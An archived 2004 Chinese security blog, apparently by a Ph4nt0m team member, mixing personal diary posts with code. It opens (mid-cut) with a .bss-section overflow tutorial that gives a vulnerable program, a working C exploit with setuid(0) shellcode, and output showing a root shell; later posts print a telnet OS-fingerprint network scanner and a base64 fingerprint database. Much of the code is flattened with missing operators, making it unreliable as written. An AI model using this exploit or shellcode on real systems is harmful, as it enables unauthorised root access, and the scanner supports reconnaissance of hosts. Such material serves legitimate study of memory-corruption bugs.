来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/index.php?blogid=37891 存档链接: https://web.archive.org/web/20041207012014id_/http://www.blogbus.com:80/blogbus/blog/index.php?blogid=37891

BSS if( c != 3 ){ fprintf ( stderr , "usage:%s \n" , v [ 0 ]); return ; } cmd

"/usr/bin/id" ; // 将被覆盖的静态指针 printf ( "buf addr = %p,cmd addr = %p,diff = %d\n" , buf , cmd ,( unsigned long )& cmd

( unsigned long ) buf ); printf ( "CMD = %s addr = %p argv[1] = %p\n" , cmd , cmd , v [ 1 ]); strncpy ( buf , v [ 2 ], strlen ( v [ 2 ])); printf ( "Now CMD = %s addr = %p\n" , cmd , cmd ); system ( cmd ); } [Bytes@BytesWorkStation2# heap]$ ./bss usage:./bss [Bytes@BytesWorkStation2# heap]$ ./bss 1 1 buf addr = 0x80497b8,cmd addr = 0x80485fb,diff = 20 CMD = /usr/bin/id addr = 0x80485fb argv[1] = 0xbffffb6b Now CMD = /usr/bin/id addr = 0x80485fb uid=624(Bytes) gid=624(Test) groups=624(Test) [Bytes@BytesWorkStation2# heap]$ ./bss '/bin/bash;' perl -e 'print "B"x20 ."\x28\xfb\xff\xbf"' buf addr = 0x80497b8,cmd addr = 0x80485fb,diff = 20 CMD = /usr/bin/id addr = 0x80485fb argv[1] = 0xbffffb2a Now CMD = /bin/bash; addr = 0xbffffb2a [Bytes@BytesWorkStation2# heap]$ [Bytes@BytesWorkStation2# heap]$ ps PID TTY TIME CMD 25583 pts/0 00:00:00 bash 25997 pts/0 00:00:00 bss 25998 pts/0 00:00:00 bash 26070 pts/0 00:00:00 ps 填充20个字节的垃圾数据,刚好覆盖到指针n,最后用/bin/bash;(加';'是为了保证命令正确执行,不被溢出后垃圾数据干扰,当然你也可以用'#'等字符)的地址覆盖cmd指针,该地址可以在一定范围进行猜测,也可以准确计算获得,本例为了方便起见,在缺陷程序中直接输出了.下面是一个更实际一点的例子,相同的原理,我们填充足够多的数据(260字节垃圾数据+4字节地址量,该地址指向一段可执行机器码---shellcode)就可以覆盖得到函数指针一个shell. Codz: /* Example vulnerable .bss section overflow Challenge one SolarIce 2004 www.covertsystems.org */ #include <string.h> #include <stdlib.h> #define LEN 256 void output ( char ); int main ( int argc , char ** argv ) { static char buffer [ LEN ]; static void ( func ) ( char *); func = output ; strcpy ( buffer , argv [ 1 ]); func ( buffer ); return EXIT_SUCCESS ; } void output ( char

string ) { fprintf ( stdout , "%s" , string ); } 攻击代码如下: Codz: /* Exploit for CRS .bss section overflow Challenge one Code By Bytes<Bytes[at]ph4nt0m.org> Put shellcode to Environment Ph4nt0m Security Team --- http://www.ph4nt0m.org/ ** / #include <stdio.h> #include <stdlib.h> #include <string.h> #define bufsize 260 / setuid(0) shellcode by by Matias Sedalo 3x ^_^ / char shellcode [] = "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; int main ( void ){ char buf [ bufsize ] ; char proc []={ "./bss2" , buf , NULL }; char * envir []={ "Bytes=2Lu" , shellcode , NULL }; unsigned long ret_addr

0xc0000000

strlen ( proc [ 0 ]) - strlen ( shellcode )- sizeof ( void *) - 0x02 ; memset ( buf , 0x42 , sizeof ( buf )); memcpy ( buf + bufsize

4 ,( char )& ret_addr , 4 ); execve ( proc [ 0 ], proc , envir ); return 0 ; } [Bytes@BytesWorkStation2# heap]$ ls -al bss2 -rwsr-sr-x 1 root root 11865 Oct 23 08:25 bss2 [Bytes@BytesWorkStation2# heap]$ id uid=624(Bytes) gid=624(Test) groups=624(Test) [Bytes@BytesWorkStation2# heap]$ ./expbss2 sh-2.05b# id uid=0(root) gid=624(Test) groups=624(Test) sh-2.05b# Bytes 发表于 08:36 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑心声 - 2004-10-15 03:56 唯一就是唯一. My h34r7 g0 0n~~~ D0 my b327 l0v3 my l0v3r...though blooding... Bytes 发表于 03:56 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑最难的事 - 2004-10-14 02:52 最难的事，是写新诗，写得不好，便变成短句。最难的事，是对人好，对方不领情，你便变成擦鞋仔。最难的事，是追求，她不喜欢你，便变成你性骚扰她。最难的事，是容忍，越是宽大容忍，越容易被误为懦弱，欲辩无词。最难的事，是表白，稍微激动，便成为哭诉，被误为理亏，想博取同情。最难的事，是爱他人，爱得太好，是一相情愿；爱得不好，则有被抛弃之虞。最难的事，是关心，稍稍控制不当，便变成管束。最难的事，是提出分手。说得太绝，被视为抛弃行动；说得委婉，对方却不明白。最难的事，是第一次约会，穿得太好，怕他视穿你有意。穿得不好，怕没有第二次。最难的事，是欲拒还迎，拒的不够技巧，对方已不来第二次。最难的事，是重拾旧欢，有被同一个人抛弃多一次的危险。最难的事，是写专栏，不够努力，写得不好，会被通知改版，请不要再交稿。非常努力，篇篇精彩，会被认为早已狠到发烧 Bytes 发表于 02:52 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑 Share一个垃圾 - 2004-10-13 22:25 上次那个工具的一个附带小tools share一个垃圾---得到telnet fingerprint的tools,就不用那么麻烦用sniffer了. / Code : get_tfp.c Author: Bytes<Bytes[at]ph4nt0m.org> Team : Ph4nt0m Security Team --- http://www.ph4nt0m.org/ Notice: get telnet fingerpint ** Date : 2004-10 / #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int Sreadn ( int fd , char ptr , int n ){ int i ; int num_rd ; char * Pptr ; Pptr

ptr ; i

n ; while( i

0 ){ if(( num_rd

read ( fd , ptr , i )) < 0 ){ perror ( "read" ); if( errno

EINTR ) num_rd

0 ; else return - 1 ; }else{ if( num_rd

0 ) break; i -= num_rd ; Pptr += num_rd ; } return ( n

i ); } // read n bytes from fd,ptr -> buffer } int ht_to_ip ( char * host , long * ip ){ struct hostent * Host ; if((* ip

inet_addr ( host )) < 0 ){ if(( Host

gethostbyname ( host )) == 0 ){ fprintf ( stderr , "%s:unknown host\n" , host ); exit(- 1 ); } * ip = ( unsigned long ) Host -> h_addr ; } return 0 ; } // host to ip int main ( int c , char * v []){ struct sockaddr_in myaddr ; int sockfd ; int n ; int i ; char buffer [ 256 ]; if( c != 2 ){ fprintf ( stderr , "\t-----------------------------------------------------------\n" ); fprintf ( stderr , "\tGet telnet fingerprint code By Bytes<Bytes[at]ph4nt0m.org\n" ); fprintf ( stderr , "\thttp://www.ph4nt0m.org/ date:2004-10 \n" ); fprintf ( stderr , "\t------------------------------------------------------------\n" ); fprintf ( stderr , "\n\tusage:%s \n" ); return; } if(( sockfd

socket ( AF_INET , SOCK_STREAM , 0 )) < 0 ){ //perror("socket"); return - 1 ; } bzero ( buffer , sizeof ( buffer )); ht_to_ip ( v [ 1 ],( unsigned long *)& myaddr . sin_addr . s_addr ); myaddr . sin_family

AF_INET ; myaddr . sin_port

htons ( 23 ); if( connect ( sockfd ,( struct sockaddr *)& myaddr , sizeof ( myaddr )) == - 1 ){ perror ( "connect" ); exit(- 1 ); } if(( n

Sreadn ( sockfd , buffer , 200 )) < 0 ){ return - 1 ; } printf ( "[+] HOST <%s> fingerprint: " , v [ 1 ]); for( i

0 ; i < strlen ( buffer ); i ++){ printf ( "%2x " , buffer [ i ]); } printf ( "\n" ); return 0 ; } Bytes 发表于 22:25 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑马赛曲 - 2004-10-12 06:53 法兰西共和国国歌,经典的马赛曲,送给现在和我一样需要沸腾的热血浇灌的人们. http://www.ebubu.cn:8010/resource/music/zmjxq/msq.mp3 Bytes 发表于 06:53 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑 Many Many more ... - 2004-10-12 06:49 有一种寂寞,有一种冷淡,有一种悲凉,有一种凄惨,有一种痛楚,有一种哀怨...<<西雅图夜未眠>>中的安妮让我感觉很厌恶,但更多的是无奈,有多少女人不正是依循着自己的感觉而妄加判断生活的呢?这只能说是一种生活方式,或者说是一种思维方式吧?嗬嗬.所能去用来去面对的,只能是无奈. 在这颗蔚蓝的星球上,有许多人每天谈论着汉堡包的美味, Maria Carla(DNS)的性感美貌,朝荷兰激情的欢叫,<<硬球>>的征服与被征服的辩证,契科夫的<<夜晚的旋律>>,甚至于天有多蓝,云游多舒,情有多缥缈...但从未有过谁高呼,臭氧的伟大,我们所忽略的,空气,水,正是我们肌体正在享有的关爱. 失态几日,在群里向着同伴发泄,对着同伴速递色情小图片,记得肉肉说,希望你快点走出来.走出来,我会的,打破最后的冀望,最后的呵护,最后的幻想,最后的爱恋,最后的留恋...我还算正常吧,至少我没有去Do 女票,我至少我还在Do my best loving my lover... 谢绝理智,谢觉思考.现在的理智把我拉向偏激的角落,现在的思考哄骗我加入"粪青"的阵营,我不想愤世嫉俗,我也不曾愤世嫉俗,我只是平平常常的去爱,平平常常的去痛,就好比一杯啤酒下肚,一溜烟圈划破眼帘一样,引起的饱胀,扎出的泪沫,都是再平常不过的年轻的生活. 活着总只有这么几年,说不准哪天一不留神,就谢世了.死我不怕,但我畏惧死后的未知,不是对于死后所要面对的"世界"的未知,而是对于我死后,生前世界变化的未知的恐惧. 记得一句话,I need more money to fuck mms,记得一句台词,I like a piece of firewood,原来最原始的,才是最想要的,最原始的,也是最真实的,最原始的,也是最诚实的.欲望不会欺骗你,就好比你的尖牙永远无法不会划伤你的鼻梁骨一样,给你你想要,你要想的,就是你想得到的... 世界上最可怕的人,不是凶残的恶棍,异不是那可能潜在,有可能是捏造的天外来客,也并非<<聊斋>>中的千奇百怪,而是那种容易被同化,被吞噬,甚至与被吞没的,拥有人云亦云的性格的人.对于自己的感情,对于自己的感觉,举棋不定,把握不了,掌控在他人言语之间的人,真不知这是一种个性,还是一种愚蠢. 说话总是要受刺激的,此时,我受了什么刺激呢?刚才吗?去TMD,Shit! Bytes 发表于 06:49 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑 Telnet fingerprint Scanner:PTS-TSN_OS[scanner].c - 2004-10-12 02:53 /* Copyright (c) 2004,Ph4nt0m Security Team,all rights reserved Code : PTS-TSN_OS[scanner].c Athor : Bytes<Bytes[at]ph4nt0m.org> Team : Ph4nt0m Security Team --- http://www.ph4nt0m.org/ Notice : Telnet fingerprint(TSN) scanner:relies on telnet session negotiations to detect the kinds of OS and equipment. Greatze: #ph4nt0m,#music@0x557,TESO(thx their "fps"),airsupply(thx his code), All PST members,my penis(^^). Date : 2004-10 P.S : Kiz Jambalaya's anus ^^ and i like a piece of firewood.( What does it mean?^+^) / / Header Files / #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <arpa/telnet.h> // Header of telnet protocol definitions,options and more information #include <netinet/in.h> / Macro / #define VERSIoN "$-" #define TM_OUT 1 // default time of timeout... #define DB_FPS "DB_fps" / ** Define functions / void Usage ( char * vv ){ fprintf ( stderr , "\n\t+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n" ); fprintf ( stderr , "\tPTS-TSN_OS[scanner] By Bytes<Bytes[at]ph4nt0m.org> 2004-10\n" ); fprintf ( stderr , "\t http://www.ph4nt0m.org/\n" ); fprintf ( stderr , "\t------------------------------------------------------------\n\n" ); fprintf ( stderr , "\tusage:%s [timeout:default=1]\n" , vv ); return; } / int Sreadn(int fd,void ptr,int n){ int i; int num_rd; char Pptr; Pptr = ptr; i = n; while(i > 0){ if((num_rd = read(fd,ptr,i)) < 0){ perror("read"); if(errno == EINTR) num_rd=0; esle return -1; }else{ if(num_rd == 0) break; i -= num_rd; Pptr += num_rd; } return (n - i); ** } // read n bytes from fd,ptr -> buffer / int NO_B_connect ( char ht_net , int port , int s ){ struct sockaddr_in myaddr ; struct hostent * hp ; struct in_addr ** Pptr ; struct timeval tmval ; int Sfd ; int flags ; int n ; int error ; int len ; fd_set rd_set ; fd_set wt_set ; if(( Sfd

socket ( AF_INET , SOCK_STREAM , 0 )) < 0 ) return - 1 ; myaddr . sin_family

AF_INET ; myaddr . sin_port

htons ( port ); myaddr . sin_addr . s_addr

inet_addr ( ht_net ); flags

fcntl ( Sfd , F_GETFL , 0 ); fcntl ( Sfd , F_SETFL , flags | O_NONBLOCK ); error

0 ; if(( n

connect ( Sfd ,( struct sockaddr *)& myaddr , sizeof ( myaddr ))) < 0 ){ if( errno != EINPROGRESS ) return - 1 ; } if( n

0 ){ fcntl ( Sfd , F_SETFL , flags ); if( error ){ close ( Sfd ); return - 1 ; } } FD_ZERO (& rd_set ); FD_SET ( Sfd ,& rd_set ); wt_set

rd_set ; tmval . tv_sec

s ; tmval . tv_usec

0 ; if(( n

select ( Sfd + 1 ,& rd_set ,& wt_set , NULL , s ? & tmval : NULL )) == 0 ){ close ( Sfd ); errno

ETIMEDOUT ; return - 1 ; } if( FD_ISSET ( Sfd ,& rd_set ) || FD_ISSET ( Sfd ,& wt_set )){ len

sizeof ( error ); if( getsockopt ( Sfd , SOL_SOCKET , SO_ERROR ,& error ,& len ) < 0 ){ return - 1 ; }else{ error

1 ; } } return Sfd ; } // no block connect void send_opts ( int sock , unsigned char * a ) { char will [] = { IAC , WILL , 0 , 0 }; char wont [] = { IAC , WONT , 0 , 0 }; while( strlen (( char ) a ) > 0 ) { if( a [ 0 ] == IAC ){ if( a [ 1 ] == DO){ will [ 2 ] = a [ 2 ]; write ( sock ,( char ) will , strlen ( will )); }else if( a [ 1 ] == DONT ) { wont [ 2 ] = a [ 2 ]; write ( sock ,( char ) wont , strlen ( wont )); } } a += 3 ; } } static int New_read ( int fd , char ptr ){ static int c

0 ; static char * rd_ptr ; static char rd_buf [ 1024 ]; if( c <= 0 ){ while( errno

EINTR ){ if(( c

read ( fd , rd_buf , sizeof ( rd_buf ))) > 0 ) break; } return - 1 ; }else { if( c

0 ) return 0 ; } rd_ptr

rd_buf ; c --; * ptr = * rd_ptr ++; return 1 ; } int readaline ( int fd , char * ptr , int len , int n ){ int count ; int num ; char * c ; char * Pptr ; Pptr

ptr ; for( num

1 ; num < len ; num ++){ if(( count

New_read ( fd , c )) == 1 ){ if ( num

1 ){ * ptr ++= (* c ); if((* c ) == '\n' ) break; }else{ if((* c ) == '\n' ) break; * ptr ++= (* c ); } }else if( count

0 ){ if( num

1 ) return 0 ; else break; }else return - 1 ; } * Pptr

0 ; return n ; } // read a line from fd,you can use "getline()" also,look it up "man" int Compare_strs ( char * str1 , char * str2 ){ if(( strstr ( str1 , str2 ) != NULL ) && ((( str1 + 7 + strlen ( str2 )) == '\r' ) || (( str1 + 7 + strlen ( str2 )) == '\n' ))) return 1 ; else return - 1 ; } // Compare two strings int Get_tsn ( char * host , int t_out ){ int i ; int Sock ; int r ; int lin ; char fst_rd_buf [ 255 ]; char sec_rd_buf [ 255 ]; char buffer [ 255 ]; char fst_temp [ 256 ]; char sec_temp [ 256 ]; FILE * FP ; bzero ( fst_rd_buf , sizeof ( fst_rd_buf )); bzero ( sec_rd_buf , sizeof ( sec_rd_buf )); bzero ( buffer , sizeof ( buffer )); bzero ( fst_temp , sizeof ( fst_temp )); bzero ( sec_temp , sizeof ( sec_temp )); if(( Sock

NO_B_connect ( host , 23 , t_out )) < 0 ){ return - 1 ; } if(( lin

readaline ( Sock , fst_rd_buf , sizeof ( fst_rd_buf ), 1 )) < 0 ){ return - 1 ; } for( i

0 ; i < strlen ( fst_rd_buf ); i ++){ sprintf ( fst_temp + i , "%d" , fst_rd_buf [ i ]& 0xff ); } fst_temp [ strlen ( fst_temp )- 1 ] = 0 ; send_opts ( Sock , fst_rd_buf ); if(( lin

readaline ( Sock , sec_rd_buf , sizeof ( sec_rd_buf ), 1 )) < 0 ){ return - 1 ; } for( i

0 ; i < strlen ( sec_rd_buf ); i ++){ sprintf ( sec_temp + i , "%d" , sec_rd_buf [ i ]& 0xff ); } sec_temp [ strlen ( sec_temp )- 1 ] = 0 ; send_opts ( Sock , fst_rd_buf ); close ( Sock ); if(( FP

fopen ( DB_FPS , "r" )) == NULL ){ perror ( "fopen" ); return 0 ; } for(; { if( feof ( FP )) break; fgets ( buffer , 255 , FP ); if( Compare_strs ( buffer , fst_temp ) > 0 ){ fgets ( buffer , 255 , FP ); if( Compare_strs ( buffer , sec_temp ) > 0 ){ printf ( "[+] Host:%s maybe: " , host ); for(; { fgets ( buffer , 255 , FP ); printf ( "%s" , buffer ); if(( buffer [ 0 ] == '\r' ) || ( buffer [ 0 ] == '\n' )) break; } } } } return Sock ; } int TSN_Scan ( char * start , char * end , int tt_out ){ unsigned long startip ; unsigned long endip ; unsigned long startIP ; unsigned long endIP ; unsigned long sum ; struct sockaddr_in myaddr ; char host [ 100 ]; bzero ( host , sizeof ( host )); startip

inet_addr ( start ); endip

inet_addr ( end ); startIP

ntohl ( startip ); endIP

ntohl ( endip ); for( sum

startIP ; sum <= endIP ; sum ++){ if(( sum & 0xff ) == 255 ) sum ++; if(( sum & 0xff ) == 0 ) sum ++; myaddr . sin_addr . s_addr

htonl ( sum ); strncpy ( host , inet_ntoa ( myaddr . sin_addr ), sizeof ( host )); Get_tsn ( host , tt_out ); } return 0 ; } /* ** Main program */ int main ( int c , char * v []){ int Timeout ; if( c < 3 || c

4 ){ Usage ( v [ 0 ]); return 0 ; } if( c

4 ){ Timeout

atoi ( v [ 3 ]); }else{ Timeout

TM_OUT ; } fprintf ( stderr , "[#] Now,start scaning <%s> to <%s>...\n\n" , v [ 1 ], v [ 2 ]); sleep ( 1 ); if( TSN_Scan ( v [ 1 ], v [ 2 ], Timeout ) != 0 ){ perror ( "TSN_Scan" ); return - 1 ; } return 0 ; } /* ** End / / ** Love My lover && kiz Lu */ Telnet fingerprint 方式鉴别操作系统的扫描器. 该种方式的优点是比IP stack等快,但不是很准确. fps库base64编码后贴在下面,不是很全,并且有些老,大家帮忙多收集一些,谢谢了: I3RlbG5ldGZwIGZpbmdlcnByaW50cwojc2VuZCBtb3JlIGZpbmdlcnByaW50cyB0bzogcGExbWVy c0BnbXguZGUKIyBhICcqJyBtZWFuczogYWZ0ZXIgdGhpcyBhbnl0aGluZyBtYXkgZm9sbG93CiMg YSAnPycgcmVwcmVzZW50cyBubyBvciBhbnkgcG9zc2libGUgYnl0ZQoKRE86ICAgMjU1IDI1MyAy NCAyNTUgMjUzIDMyIDI1NSAyNTMgMzUgMjU1IDI1MyAzOQpET05UOiAyNTUgMjUwIDMyIDEgMjU1 IDI0MCAyNTUgMjUwIDM1IDEgMjU1IDI0MCAyNTUgMjUwIDM5IDEgMjU1IDI0MCAyNTUgMjUwIDI0 IDEgMjU1IDI0MApMaW51eAoKRE86ICAgMTE2IDEwMSAxMDggMTEwIDEwMSAxMTYgMTAwIDU4IDMy IDk3IDU4IDMyIDExNyAxMTAgMTA3IDExMCAxMTEgMTE5IDExMCAzMiAxMTEgMTEyIDExNiAxMDUg MTExIDExMCAxMCA4NSAxMTUgOTcKRE9OVDogMTAzIDEwMSA1OCAzMiAxMTYgMTAxIDEwOCAxMTAg MTAxIDExNiAxMDAgMzIgOTEgNDUgMTAwIDEwMSA5OCAxMTcgMTAzIDkzIDMyIDkxIDQ1IDY4IDMy IDQwIDExMSAxMTIgMTE2IDEwNQpMaW51eCB3aXRoIGF1dGhlbnRpY2F0aW9uIG1vZGUgZGVmaW5l ZAoKRE86ICAgMTE2IDEwMSAxMDggMTEwIDEwMSAxMTYgMTAwIDU4IDMyIDk3IDU4IDMyIDExNyAx MTAgMTA3IDExMCAxMTEgMTE5IDExMCAzMiAxMTEgMTEyIDExNiAxMDUgMTExIDExMCAxMApET05U OiA4NSAxMTUgOTcgMTAzIDEwMSA1OCAzMiAxMTYgMTAxIDEwOCAxMTAgMTAxIDExNiAxMDAgMzIg OTEgNDUgMTAwIDEwMSA5OCAxMTcgMTAzIDkzIDMyIDkxIDQ1IDY4IDMyIDQwIDExMQpMaW51eCB3 aXRoIGF1dGhlbnRpY2F0aW9uIG1vZGU6IG5vbmUKCkRPOiAgIDExNiAxMDEgMTA4IDExMCAxMDEg MTE2IDEwMCA1OCAzMiAxMTUgNTggMzIgMTE3IDExMCAxMDcgMTEwIDExMSAxMTkgMTEwIDMyIDEx MSAxMTIgMTE2IDEwNSAxMTEgMTEwIDEwIDg1IDExNSA5NwpET05UOiAxMDMgMTAxIDU4IDMyIDEx NiAxMDEgMTA4IDExMCAxMDEgMTE2IDEwMCAzMiA5MSA0NSAxMDAgMTAxIDk4IDExNyAxMDMgOTMg MzIgOTEgNDUgNjggMzIgNDAgMTExIDExMiAxMTYgMTA1CkxpbnV4IHdpdGggc3VwcG9ydCBmb3Ig U2VjdXJJRCBjYXJkcyBlbmFibGVkCgpETzogICAxMTYgMTAxIDEwOCAxMTAgMTAxIDExNiAxMDAg NTggMzIgKgpET05UOiAqCnByb2JhYmx5IExpbnV4CgpETzogICA4NSAxMTUgOTcgMTAzIDEwMSA1 OCAzMiAxMTYgMTAxIDEwOCAxMTAgMTAxIDExNiAxMDAgMzIgOTEgNDUgMTAwIDEwMSA5OCAxMTcg MTAzIDkzIDMyIDkxIDQ1IDY4IDMyIDQwIDExMQpET05UOiAxMTIgMTE2IDEwNSAxMTEgMTEwIDEx NSAxMjQgMTE0IDEwMSAxMTIgMTExIDExNCAxMTYgMTI0IDEwMSAxMjAgMTAxIDExNCA5OSAxMDUg MTE1IDEwMSAxMjQgMTEwIDEwMSAxMTYgMTAwIDk3IDExNiA5NwpMaW51eCAod2l0aCBUQ1Aga2Vl cC1hbGl2ZXMgZW5hYmxlZCkKCkRPOiAgIDI1NSAyNTMgMjQgMjU1IDI1MyAzMiAyNTUgMjUzIDM1 IDI1NSAyNTMgMzkgMjU1IDI1MyAzNgpET05UOiAyNTUgMjUwIDMyIDEgMjU1IDI0MCAyNTUgMjUw IDM1IDEgMjU1IDI0MCAyNTUgMjUwIDM5IDEgMjU1IDI0MCAyNTUgMjUwIDI0IDEgMjU1IDI0MApG cmVlQlNECkRpZ2l0YWwgVW5peCA0LjBkL2UKTmV0QlNEIDEuNC4yClRydTY0IFVOSVggVjUuMEEK CkRPOiAgIDI1NSAyNTMgMzcKRE9OVDogMjU1IDI1MCAzNyAxIDI1NSAyNDAKT3BlbkJTRCAyLjYK QlNESSA0LjAgLyAzLjAKCkRPOiAgIDI1NSAyNTMgMzcKRE9OVDogMjU1IDI1MCAzNyAxIDYKRnJl ZUJTRCA0LjEtU1RBQkxFCgpETzogICAyNTUgMjUzIDI0IDI1NSAyNTMgMzIgMjU1IDI1MyAzNSAy NTUgMjUzIDM2CkRPTlQ6IDI1NSAyNTAgMzIgMSAyNTUgMjQwIDI1NSAyNTAgMzUgMSAyNTUgMjQw IDI1NSAyNTAgMzYgMSAyNTUgMjQwIDI1NSAyNTAgMjQgMSAyNTUgMjQwCklSSVggNS4zIC8gNi41 CgpETzogICAyNTUgMjUzIDI0CkRPTlQ6IDI1NSAyNTAgMjQgMSAyNTUgMjQwCkFJWDQKU3lzViBV bml4IDQuMApTdW5PUyA0LjAgLyA1LjQKUGFja2V0ZWVyIFBhY2tldFNoYXBlciAxNTAwCgpETzog ICAxMyAxMCA3NyA5NyAxMTUgMTE2IDEwMSAxMTQgNDYgMTMgMTAKRE9OVDogMjU1IDI1MSAzClN1 bk9TIDUuNgoKRE86ICAgMjU1IDI1MyAyNCAyNTUgMjUzIDMxIDI1NSAyNTMgMzUgMjU1IDI1MyAz OSAyNTUgMjUzIDM2CkRPTlQ6IDI1NSAyNTAgMjQgMSAyNTUgMjQwIDI1NSAyNTAgMzUgMSAyNTUg MjQwIDI1NSAyNTAgMzkgMSAyNTUgMjQwIDI1NSAyNTAgMzYgMSAyNTUgMjQwClN1bk9TIDUuOCAv IDUuNyAvIDUuNiAvIDUuNSAvIDUuNS4xClN5c1YgVW5peCA0LjAKCkRPOiAgIDI1NSAyNTMgMzcK RE9OVDogMjU1IDI1MCAzNyAxIDIgMiAyClNDTyBPcGVuU2VydmVyIFJlbGVhc2UgNQoKRE86ICAg MjU1IDI1MSAxCkRPTlQ6IDEwIDEzIDY3IDExMSAxMTIgMTIxIDExNCAxMDUgMTAzIDEwNCAxMTYg MzIgNDAgNjcgNDEgMzIgNDkgNTcgNTcgNTcgMzIgOTggMTIxIDMyIDMyIDY5IDEyMCAxMTYgMTE0 IDEwMQpCbGFjayBEaWFtb25kIHN3aXRjaAoKRE86ICAgMjU1IDI1MSAxIDI1NSAyNTMgMyAxMyAx MCAyNyA3MiAyNyA4OCAxMyAxMCAxMyAxMCA4NyAxMDEgMTA4IDk5IDExMSAxMDkgMTAxIDMyIDEx NiAxMTEgMzIgNjYgNzMgNjUKRE9OVDogNzggNjcgNjUgNDcgNjYgODIgNzMgNjcgNzUgNDUgODgg NzYgMzIgMTE4IDEwMSAxMTQgMTE1IDEwNSAxMTEgMTEwIDMyIDg2IDQ2IDUzIDQ2IDQ5IDMyIDgy IDEwMSAxMTgKQmludGVjIEJyaWNrCgpETzogICAyNTUgMjUxIDEKRE9OVDogMjU1IDI1MSAzIDI1 NSAyNTMgMyAxMyAxMCAxMyAxMCA0MCAxMDkgOTcgMTIwIDUwIDQ2IDEwMCAxMDUgOTcgMTA4IDEw NSAxMTAgNDUgMTAyIDEwMiAxMDkgNDEgMzIgNjkgMTEwCkx1Y2VudCBNQVggVE5UCgpETzogICAy NTUgMjUxIDEgMjU1IDI1MSAzIDI1NSAyNTMgMyAxMyAxMCAxMyAxMCA0MCA3OCA2NiA0MSAzMiA2 OSAxMTAgMTE2IDEwMSAxMTQgMzIgMTEyIDk3IDExNSAxMTUgMTE5IDExMQpET05UOiAxMTQgMTAw IDU4IDMyCkFzY2VuZCBQaXBlbGluZSA1MCBJU0ROIHJvdXRlcgoKRE86ICAgMjU1IDI1MSAxIDI1 NSAyNTEgMyAyNTUgMjUzIDMgMTMgMTAgMTMgMTAgNDAgMTE2IDExNSAxMTcgMTA2IDQ5IDQ2IDEw NyAxMTcgMTE0IDk3IDExNSA5OSA0NiAxMDcgMTIxIDExMQpET05UOiAxMTYgMTExIDQ1IDExNyA0 NiA5NyA5OSA0NiAxMDYgMTEyIDQxIDMyIDY5IDExMCAxMTYgMTAxIDExNCAzMiAxMTIgOTcgMTE1 IDExNSAxMTkgMTExIDExNCAxMDAgNTggMzIKQXNjZW5kIFBpcGVsaW5lIDUwCgpETzogICAyNTUg MjUxIDEgMjU1IDI1MSAzCkRPTlQ6IDEzIDEwIDY5IDExMCAxMTYgMTAxIDExNCAzMiA1OCAzMiA2 MCAxMDQgMTExIDExNSAxMTYgNjIgMzIgOTEgMTEyIDExMSAxMTQgMTE2IDkzIDMyIDU4IDMyCldp bmRvd3MKCkRPOiAgIDI1NSAyNTMgMzcgMjU1IDI1MSAxIDI1NSAyNTMgMyAyNTUgMjUzIDMxIDI1 NSAyNTMKRE9OVDogMjU1IDI1MCAzNyAxIDE1ClcyMDAwCgpETzogICAyNTUgMjUxIDEgMjU1IDI1 MSAzCkRPTlQ6IDEzIDEwIDEzIDEwIDg3IDEwMSAxMDggOTkgMTExIDEwOSAxMDEgMzIgMTE2IDEx MSAzMiAxMTYgMTA0IDEwMSAzMiA4NCAxMDEgMTA4IDExMCAxMDEgMTE2IDMyIDgzIDEwMSAxMTQg MTE4CldpbmRvd3MKCkRPOiAgIDI1NSAyNTQgMQpET05UOiAyNTUgMjUzIDMgMjU1IDI1MyAyNCAy NTUgMjUzIDMxIDI1NSAyNTEgMyAyNTUgMjUxIDEKQXRhbWFuIFRlbG5ldGQgU2VydmVyIGZvciBX aW5kb3dzCgpETzogICAyNTUgMjUxIDEgMjU1IDI1MQpET05UOiAyNTUgMjUzIDMKV2luZG93cyAo Rmlyc3RDbGFzcyBUZWxuZXQgRGFlbW9uKQoKRE86ICAgMjU1IDI1MSAzIDI1NSAyNTEgMSAyNTUg MjUxCkRPTlQ6IDY1IDExNyAxMTYgMTExIDQ1IDExNSAxMDEgMTEwIDExNSAxMDUgMTEwIDEwMyA0 NiA0NiA0NiAxMyAxMCAzMiAzMiAzMiAzMiAyNyA5MSA1NCAxMTAgOCA4IDggOCAxMwpXaW5kb3dz IE5ULCBXb3JsZGdyb3VwIFh0cmVtZSBSYWRpY2FsIENoYXQgc2VydmVyIGJ5IEdhbGFjdGljb21t CgpETzogICAyNTUgMjUzIDMxCkRPTlQ6IDI1NSAyNTMgMjQgMjU1IDI1MSAxIDI1NSAyNTEgMyAx MCA4NyAxMDEgMTA4IDk5IDExMSAxMDkgMTAxIDMyIDExNiAxMTEgMzIgNzEgMTExIDExMSAxMDAg ODQgMTAxIDk5IDEwNCAzMgpHb29kVGVjaCBUZWxuZXQgU2VydmVyIGZvciBXaW5kb3dzIE5UIChW Mi4yLjEpCgpETzogICAyNTUgMjUxIDEgMjU1IDI1MSAzIDI1NSAyNTMgMjQgMTMgMTAgMTAgNzYg OTcgMTEwIDExNiAxMTQgMTExIDExMCAxMDUgMTIwIDMyIDY5IDgwIDgzIDQ5IDMyIDg2IDEwMSAx MTQgCkRPTlQ6IDExNSAxMDUgMTExIDExMCAzMiA4NiA1MSA0NiA1MyA0NyA0OSA0MCA1NyA1NSA0 OCA1MSA1MCA1MyA0MSAxMCAxMyAxMCAKTGFudHJvbml4IEVQUzEgVmVyc2lvbiBWMy41LzEoOTcw MzI1KQoKRE86ICAgMjU1IDI1MyAzIDI1NSAyNTEgMSAyNyA5MSA1MCA3NCAyNyA5MSA0OSA1OSA0 OSA3MiAyNyA5MSA0OCAxMDkgMjcgOTEgNjMgNTEgMTA4IDI3IDkxIDQ4IDU5IDQ5IApET05UOiAx 